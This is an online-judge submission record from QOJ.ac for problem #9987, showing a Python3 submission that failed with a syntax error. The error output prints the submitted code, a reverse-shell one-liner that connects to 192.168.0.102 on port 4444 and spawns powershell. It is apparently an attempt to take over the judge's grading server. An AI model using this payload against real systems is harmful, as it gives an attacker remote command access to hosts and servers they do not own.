QOJ.ac

QOJ

ID题目提交者结果用时内存语言文件大小提交时间测评时间
#869197#9987. 骑行计划HuangHanShengCompile Error//Python3224b2025-01-25 00:16:082025-01-25 00:16:08

詳細信息

  File "answer.code", line 1
    export RHOST="192.168.0.102";export RPORT=4444;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("powershell")'
           ^^^^^
SyntaxError: invalid syntax